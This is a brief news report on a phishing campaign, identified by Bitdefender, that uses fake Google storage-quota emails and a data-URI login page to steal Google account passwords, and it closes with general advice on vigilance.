Hackers using advanced phishing attack to steal Google passwords

Open sesame: hackers phish for login credentials

Hackers are using a new and more sophisticated way of phishing to secure access to Google account passwords, according to anti-malware firm Bitdefender.

The attack uses an email that warns users their account will be locked within 24 hours due to using all of their storage quota, unless they click the link to instantly increase their storage.

When the link is clicked, it redirects to a fake Google login authentication, which mimics the real one, but sends the data to hackers instead.

The attack is difficult to catch with traditional heuristic detection. It is also difficult for users to notice, thanks to the use of a data URI scheme that includes data in the browser address bar.

Not all of this information is displayed in Google Chrome, making it the most vulnerable browser to this type of attack. However, Firefox is also affected.

Gone fishing

Phishing attacks have been on the rise. A Kaspersky Labs report shows that a third of phishing attacks are designed to hijack personal details that can then be used to steal money.

"With access to users' Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents," said Catalin Cosoi, Chief Security Strategist at Bitdefender.

"The scam starts with an email allegedly sent by Google, with 'Mail Notice' or 'New Lockout Notice' as a subject."

The best defence is vigilance and common sense. Generally speaking, most genuine companies do not ask users to supply them with passwords.